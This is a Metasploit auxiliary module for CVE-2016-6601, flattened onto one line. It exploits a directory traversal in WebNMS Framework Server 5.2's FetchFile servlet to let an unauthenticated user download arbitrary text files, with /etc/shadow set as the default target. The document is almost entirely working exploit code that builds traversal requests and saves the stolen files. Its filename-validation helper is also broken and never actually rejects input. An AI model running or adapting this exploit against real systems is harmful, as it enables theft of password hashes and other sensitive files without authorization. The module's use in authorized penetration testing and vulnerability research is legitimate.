WebNMS Framework Server Arbitrary Text File Download

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WebNMS Framework Server Arbitrary Text File Download',        'Description' => %q{          This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an          unauthenticated user to download files off the file system by using a directory          traversal attack on the FetchFile servlet.          Note that only text files can be downloaded properly, as any binary file will get          mangled by the servlet. Also note that for Windows targets you can only download          files that are in the same drive as the WebNMS installation.          This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on          Windows and Linux.        },        'Author' => [          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module        ],        'License' => MSF_LICENSE,        'References' => [          [ 'CVE', '2016-6601'],          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],          [ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ]        ],        'DisclosureDate' => '2016-07-04'      )    )    register_options(      [        OptPort.new('RPORT', [true, 'The target port', 9090]),        OptString.new('TARGETURI', [ true, 'WebNMS path', '/']),        OptString.new('FILEPATH', [ false, 'The filepath of the file you want to download', '/etc/shadow']),        OptString.new('TRAVERSAL_PATH', [ false, 'The traversal path to the target file (if you know it)']),        OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10])      ],      self.class    )  end  def check_filename(path)    valid = true    invalid_chars = [':', '?', '*', '|', '"', '<', '>']    invalid_chars.each do |i|      if path.include? i        valid = false        break      end    end  end  def run    if check_filename(datastore['filepath'])      file = nil      if datastore['TRAVERSAL_PATH'].nil?        traversal_size = datastore['MAX_TRAVERSAL']        file = get_file(datastore['FILEPATH'], traversal_size)      else        file = get_file(datastore['TRAVERSAL_PATH'], 1)      end      if file.nil?        print_error("#{peer} - Failed to download the specified file.")        return      else        vprint_line(file)        fname = File.basename(datastore['FILEPATH'])        path = store_loot(          'webnms.http',          'text/plain',          datastore['RHOST'],          file,          fname        )        print_good("File download successful, file saved in #{path}")      end    else      print_error('Module Failed: Invalid Filename')    end  end  def get_file(path, depth)    while depth > 0      file_name = '../' * depth + path      vprint_status("Attempting to get file: #{file_name}")      begin        res = send_request_cgi(          {            'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'),            'method' => 'GET',            'vars_get' => { 'fileName' => file_name }          }        )      rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,             Rex::HostUnreachable, Errno::ECONNRESET => e        print_error("Connect to the target: #{e.class} - #{e.message}")        return nil      end      if res &&         res.code == 200 &&         !res.body.to_s.empty? &&         (res.body.to_s.include? 'File Found')        return res.body.to_s      end      depth -= 1    end  endend